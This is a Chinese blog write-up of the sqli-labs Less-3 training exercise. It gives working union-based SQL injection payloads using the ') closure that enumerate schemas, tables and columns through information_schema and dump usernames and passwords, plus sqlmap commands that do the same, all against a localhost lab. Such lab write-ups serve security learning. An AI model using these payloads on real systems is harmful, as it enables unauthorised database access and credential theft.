当前位置: 首页 > news >正文

sqli-labs(第三关)

news 2024/11/6 21:23:49

前言:

今天做第三关。

正文:

进入第三关页面:
在这里插入图片描述
(1)看注入点,判断注入类型。

?id=1'   #报错
?id=1''  #不报错

说明是字符型,注入点为id
(2)找列

?id=1' order by 3 --+

这个时候发现报错了。
在这里插入图片描述
有问题,我看别人的payload,是我的闭合方式错了,系统提示的地方有一个 ') 这个就是闭合方式。

 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to
use near 'order by 3 -- ') LIMIT 0,1' at line 1

那么好,把单引号闭合方式换成 ')
再试一下:

?id=-1') order by 2 --+
?id=-1') order by 3 --+
?id=-1') order by 4 --+

在这里插入图片描述
(3)找数据库名字

?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata--+

在这里插入图片描述
(4)查数据库中的表的名字

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

在这里插入图片描述
(5)查users表

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

在这里插入图片描述
(6)查users表中的值

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+

在这里插入图片描述

下面用SQLMAP跑一遍:

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 --dbs

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security --tables

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security -T users --column

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security -T users -C id,password ,username --dump

在这里插入图片描述

哈哈哈,结束!!!


http://www.mrgr.cn/news/67028.html

相关文章:

  • Windows Server2012 R2搭建NFS服务器
  • Type-C接口 PD 受电端(sink)快充协议芯片,XSP08Q应用小家电领域的方案
  • 损失函数的分类
  • GeoSever发布图层(保姆姬)
  • python爬取旅游攻略(1)
  • 关于Linux系统调试和性能优化技巧有哪些?
  • 全流程揭秘:如何打造一个虚拟3D展厅?
  • memcache redis区别
  • 支持向量机相关证明 解的稀疏性
  • 如何解决反向代购业务中的物流难题?
  • 拦截器获取controller上的自定义注解
  • 代码随想录 | Day38 | 动态规划 :01背包应用 目标和一和零
  • LeetCode:3254. 长度为 K 的子数组的能量值 I(模拟 Java)
  • 登录注册窗口(一)
  • 【IC验证面试常问问题-2】
  • 【网络】数据链路层
  • 【科普笔记】——什么是环境变量
  • Spark的Standalone集群环境安装
  • 遥感图像数字处理 - 1
  • QMetaObject::invokeMethod异步调用一个函数,并传入自定义类型参数
  • python数据结构基础(5)
  • Ansys Zemax | 将CODE V设计导入OpticStudio
  • 【高中生讲机器学习】23. 最大熵模型详解+推导来啦!解决 why sigmoid!
  • 增强型MOS管的工作原理:【图文讲解】
  • sls日志服务采集json格式日志
  • mysql的触发器